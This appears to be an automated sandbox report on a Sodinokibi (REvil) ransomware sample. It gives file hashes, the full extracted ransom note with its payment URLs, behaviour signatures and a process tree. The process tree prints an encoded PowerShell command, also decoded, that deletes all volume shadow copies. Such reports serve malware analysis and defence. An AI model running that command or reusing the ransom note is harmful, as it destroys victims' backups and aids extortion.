Analysis

  • max time kernel
    93s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08-09-2024 07:46

General

  • Target

    d3e026324b81c755f9058d7a42e96c75_JaffaCakes118.exe

  • Size

    165KB

  • MD5

    d3e026324b81c755f9058d7a42e96c75

  • SHA1

    35d30a689c4b826e43d9255574fa09965c0a6ba7

  • SHA256

    f7c922293637486c307b6d1f05da1eb686a330c527981e0b0f079602e9cfd3d3

  • SHA512

    e9eb060168da1db8dafac357835ffc2272dc3fdbae31c77d810c188299657c824255cc1f337ac25420c57ebe821a838f4e92e5fdf7778a4a6692e777305b3913

  • SSDEEP

    3072:eCEq0R0nZ5ys5n4Y9doh7O79siUs/Na/CUtnBr8rl2a:lw02sJPi7O93NSnBkl

Malware Config

Extracted

Path

C:\Users\v2264g4-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. CDHFUND. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension v2264g4. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A064A2D02E6C7F51
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.top/A064A2D02E6C7F51
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form: Key: Xfwt/du9tm4sw5/1XlCi8i7p0XDMrFBNHZjmBSTPi/IzsfXpA9JwpS/QJXiz/QhY i00Gamx7udAIMdwpy50QWrZOPK72xBQb8zd1Ja8b1Fij0N0pk6uOyrbwOFnVS72u g1MITnWpsLvlhP0IhBKnV9LlHFoRAVWJeKDMJRHszdBFChIr5NaC2sV+yVMMu2qb MdVUN3l7zygLfEXKT+Q7GD+GKuybNt+M2zud+V8eWAEvujZ8mF5I53bjQ0W7D+pJ ouOlsUfhpaMwfp4fELJ912giuUQPJfYDTs+EQqXKDiRCn9AVu4TC4Qo34OLwb86r 7jHiRYKOKRPZJ9k7cUGXHnA2rvTdSz/5DfqkmEJK7fPTnwx5FtPLFnYAPPWm3fBh xlWtZSPlzs3NDdineBY0cQqHMRxGnwi+oUFFNFpDyo2z1yBRc7+1dUGvB3nqDoIu wmqrIIoFWW8F9X2mMWpkoqt8B3h2u3BrRqvG5OqvR8VkHVkcLQ/SN8G950WhM3C8 t6nZNqJKcNK3E56ZGgOOxE2KI1mFkuq+yruRUJZCL8GgUNAvICPtMPSNmKrjZTwd A+G+3cKAxP4a7jtBZmCa2PVEvq65MQxr2/lMxIhzi91kvAl7ipfcyQhWmbul8Iix i9OFPBlZ7QsJHTtAY9uFffG2vWUebk+BuO6MbbT3S/p8bfjEUuWte2x2IFGZ4OuU m6BM3QBCkTfScmM4NcV92hlJ/coiNzGTZkew7qbNpRSfpM1rR7sZeQtEZi46dSi8 IDSR70ACZZt9jveZaJ7fFX/StHIdZJ6bwSoRUGMf+1yiOac/14UIUjNPu+gDeYUo Z77KGw8BnF1nqoJ0JO2iluuNqhuyikEfjxnIdVkieF6N2FhGyfVx70qJ3KTqruOA 0bokfBG63Agvio0QKA/pqTqKGPglbc5nHtpVHQbMCAMuPswSbP0vaXJ1AWMOBMLr 7RsgaTDObk7P6Wa9kmZSbLkt2UllKufRe9iv2PamnrImKzDIxJQDTHDe80WZbTP4 BBkSmmpIuraIyJ8JlhbhGYCxpjRAk/TKsOm52Yo0803HkmPyMOhnOyqvzAyesh9w o9p+7UYrDImXSq8pRpyE6au8duuVLTJaVV5e+GjYDd+kRrOOSk5gI+NaWtF/fr1A RB/lB5n1a3upl+G70FVtxR0XBf7xoLBEtHoNZNRtPVDBSv493IZi1Bdt9d7sFGl9 krCPh/Hh1WYpwn7sMiEFiREWZL4= Extension name: v2264g4 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A064A2D02E6C7F51

http://decryptor.top/A064A2D02E6C7F51

Signatures

  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives (3 TTPs, 25 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  • Drops file in Program Files directory (32 IoCs)
  • System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (4 IoCs)
  • Suspicious use of WriteProcessMemory (2 IoCs)
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d3e026324b81c755f9058d7a42e96c75_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\d3e026324b81c755f9058d7a42e96c75_JaffaCakes118.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is Base64 of UTF-16LE text and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} - deletion of all volume shadow copies, which is the behaviour behind the "Uses Volume Shadow Copy service COM API" signature and the vssvc.exe start below)
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3112
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2640
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1796

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_prc03q44.fda.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\v2264g4-readme.txt

      Filesize

      6KB

      MD5

      3c4ce54f1dd3d8a3a639cfb8b9585a45

      SHA1

      737f3b816e18648f27e8ca0779bf788a25373392

      SHA256

      a596128fd243f542269c66bfae471d4390169ab3a1c2508b1f5dbed473486f26

      SHA512

      862ed02fb5d709f3072be9737da2a10b60f048a9408de0148386a1a0749e98340e61ab4fdb396df2a7215c2f44149740529bef050aabc890d062a19910a651cd

    • memory/3112-0-0x00007FFA3ECF3000-0x00007FFA3ECF5000-memory.dmp

      Filesize

      8KB

    • memory/3112-10-0x000001EDF63E0000-0x000001EDF6402000-memory.dmp

      Filesize

      136KB

    • memory/3112-11-0x00007FFA3ECF0000-0x00007FFA3F7B1000-memory.dmp

      Filesize

      10.8MB

    • memory/3112-12-0x00007FFA3ECF0000-0x00007FFA3F7B1000-memory.dmp

      Filesize

      10.8MB

    • memory/3112-15-0x00007FFA3ECF0000-0x00007FFA3F7B1000-memory.dmp

      Filesize

      10.8MB